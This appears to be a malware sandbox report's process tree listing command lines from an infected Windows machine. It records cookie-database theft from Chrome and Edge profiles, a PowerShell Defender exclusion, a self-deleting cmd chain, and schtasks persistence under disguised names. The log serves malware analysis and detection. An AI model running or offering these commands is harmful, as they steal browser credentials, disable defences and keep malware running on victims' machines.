C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\Documents\4S28JvvfnNhwRH9UyZkSJwV1.exe"C:\Users\Admin\Documents\4S28JvvfnNhwRH9UyZkSJwV1.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 2923⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv R3q930x020WnyfI9gsy3Ow.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2352 -ip 23521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4524 -ip 45241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1096 -ip 10961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 576 -ip 5761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 984 -ip 9841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2864 -ip 28641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3812 -ip 38121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1592 -ip 15921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 4603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1600 -ip 16001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1384 -ip 13841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5676 -ip 56761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 4512 -ip 45121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3824 -ip 38241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\F3B7.exeC:\Users\Admin\AppData\Local\Temp\F3B7.exe1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FB1B.exeC:\Users\Admin\AppData\Local\Temp\FB1B.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6252 -s 2602⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 1708 -ip 17081⤵
-
C:\Users\Admin\AppData\Local\Temp\1079.exeC:\Users\Admin\AppData\Local\Temp\1079.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 301A04D482C20B0C08048CEAEA2B31BD C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 29067AC1212E63BE78CF4174345DBA1B2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding CD73F69D740E6929EF7DA2524B22C095 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C7A7681350719BDE7B117B0F874B1C6B C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1F6773BA08C197D83467D92B6900BF78 C2⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffe00c3dec0,0x7ffe00c3ded0,0x7ffe00c3dee05⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ff76d609e70,0x7ff76d609e80,0x7ff76d609e906⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1560,14892285674105385990,5198252212565753635,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_860654768" --mojo-platform-channel-handle=1988 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1560,14892285674105385990,5198252212565753635,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_860654768" --mojo-platform-channel-handle=1756 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1560,14892285674105385990,5198252212565753635,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_860654768" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1576 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1560,14892285674105385990,5198252212565753635,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_860654768" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2404 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1560,14892285674105385990,5198252212565753635,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_860654768" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2568 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1560,14892285674105385990,5198252212565753635,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_860654768" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3224 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1560,14892285674105385990,5198252212565753635,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_860654768" --mojo-platform-channel-handle=3320 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1560,14892285674105385990,5198252212565753635,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_860654768" --mojo-platform-channel-handle=3404 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1560,14892285674105385990,5198252212565753635,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_860654768" --mojo-platform-channel-handle=476 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1560,14892285674105385990,5198252212565753635,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_860654768" --mojo-platform-channel-handle=2816 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1560,14892285674105385990,5198252212565753635,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8156_860654768" --mojo-platform-channel-handle=3488 /prefetch:85⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_3AE5.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 6252 -ip 62521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 6052 -ip 60521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\222D.exeC:\Users\Admin\AppData\Local\Temp\222D.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 5252 -ip 52521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\4B22.exeC:\Users\Admin\AppData\Local\Temp\4B22.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\5C69.exeC:\Users\Admin\AppData\Local\Temp\5C69.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4644 -ip 46441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\88BA.exeC:\Users\Admin\AppData\Local\Temp\88BA.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\ea6ea3d0-15d5-4011-8fd6-d96de2aa9baf\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\ea6ea3d0-15d5-4011-8fd6-d96de2aa9baf\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ea6ea3d0-15d5-4011-8fd6-d96de2aa9baf\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ea6ea3d0-15d5-4011-8fd6-d96de2aa9baf\test.bat"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\88BA.exe" -Force2⤵
-
C:\Users\Admin\AppData\Local\Temp\88BA.exeC:\Users\Admin\AppData\Local\Temp\88BA.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7424 -s 283⤵
- Program crash
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 900 -ip 9001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 6276 -ip 62761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 5576 -ip 55761⤵
-
C:\Users\Admin\AppData\Local\Temp\F07D.exeC:\Users\Admin\AppData\Local\Temp\F07D.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6660 -ip 66601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4204 -ip 42041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 1964 -ip 19641⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
-
C:\Users\Admin\AppData\Local\Temp\7EE.exeC:\Users\Admin\AppData\Local\Temp\7EE.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 3002⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7076 -ip 70761⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{3a8592e6-f0ba-284f-9ff2-c565a556624e}\oemvista.inf" "9" "4d14a44ff" "000000000000014C" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000014C" "ff04"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 5968 -ip 59681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4836 -ip 48361⤵
-
C:\Users\Admin\AppData\Local\Temp\39EC.exeC:\Users\Admin\AppData\Local\Temp\39EC.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -start2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 19643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2980 -ip 29801⤵
-
C:\Users\Admin\AppData\Local\Temp\56DC.exeC:\Users\Admin\AppData\Local\Temp\56DC.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im MSBuild.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im MSBuild.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 7460 -ip 74601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 7424 -ip 74241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 5092 -ip 50921⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8084 -s 4603⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\7F73.exeC:\Users\Admin\AppData\Local\Temp\7F73.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\comsvcs\RuntimeBroker.exe"C:\Windows\System32\comsvcs\RuntimeBroker.exe"2⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 8084 -ip 80841⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\8FEF.exeC:\Users\Admin\AppData\Local\Temp\8FEF.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\8FEF.exe"C:\Users\Admin\AppData\Local\Temp\8FEF.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 5123⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\A472.exeC:\Users\Admin\AppData\Local\Temp\A472.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\B144.exeC:\Users\Admin\AppData\Local\Temp\B144.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3268 -s 2802⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 8762⤵
- Program crash
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 6608 -ip 66081⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 792 -p 7308 -ip 73081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 3268 -ip 32681⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 1908 -ip 19081⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "svrwebui" /sc ONLOGON /tr "'C:\ProgramData\regid.1993-06.com.microsoft\NSM\svrwebui.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\powershell.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\HelpPane\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Creates scheduled task(s)
-
